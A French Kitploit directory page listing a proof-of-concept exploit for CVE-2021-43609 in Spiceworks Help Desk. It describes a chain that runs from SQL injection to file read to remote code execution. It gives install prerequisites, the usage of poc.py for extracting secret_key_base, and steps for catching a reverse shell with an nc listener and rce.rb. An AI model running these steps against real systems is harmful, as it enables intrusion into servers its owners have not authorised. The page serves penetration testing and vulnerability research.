Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-43609-POC — Exploit de preuve de concept pour CVE-2021-43609 démontrant une chaîne d'injection SQL à lecture de fichier à exécution de code à distance contre le logiciel d'assistance Spiceworks. | Kitploit
Outils/GitHubGitHub/d5sec/cve-2021-43609-poc
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubd5sec/cve-2021-43609-poc

CVE-2021-43609-POC

Exploit de preuve de concept pour CVE-2021-43609 démontrant une chaîne d'injection SQL à lecture de fichier à exécution de code à distance contre le logiciel d'assistance Spiceworks.

Voir le dépôt
512il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spiceworks Sort SQLi

Il y a une injection SQL dans un paramètre sort de Spiceworks. La chaîne complète d'exploitation est injection SQL -> lecture de fichier -> exécution de code à distance (RCE).

Demo

asciicast

Prérequis

root@kitploit:~
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install

Étape 1

Utilisez poc.py pour exploiter l'injection SQL -> lecture de fichier et extraire la variable d'environnement secret_key_base. Il générera ensuite un script ruby de preuve de concept (PoC) pour obtenir un reverse shell, avec les valeurs obtenues depuis poc.py.

Utilisation

root@kitploit:~
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]

Il y a une injection SQL dans un paramètre `sort` de Spiceworks. La chaîne d'exploitation est injection SQL -> lecture de fichier -> RCE.

arguments optionnels :
  -h, --help            affiche ce message d'aide et quitte
  --rhost RHOST         https://example.com
  --lhost LHOST         10.10.10.10
  --lport LPORT         9001
  -u USER, --user USER  [email protected]
  -p PASSWORD, --password PASSWORD
                        P@$$w0rd!
  -e ENV_PATH, --env_path ENV_PATH
                        Chemin vers les variables d'environnement

Étape 2

Utilisez rce.rb. Démarrez un écouteur nc sur l'IP et le port que vous avez fournis à l'étape 1, puis simplement :

root@kitploit:~
cd rce && ruby rce.rb

Voila!

Crédits

  • @aidanstansfield
Télécharger l’outil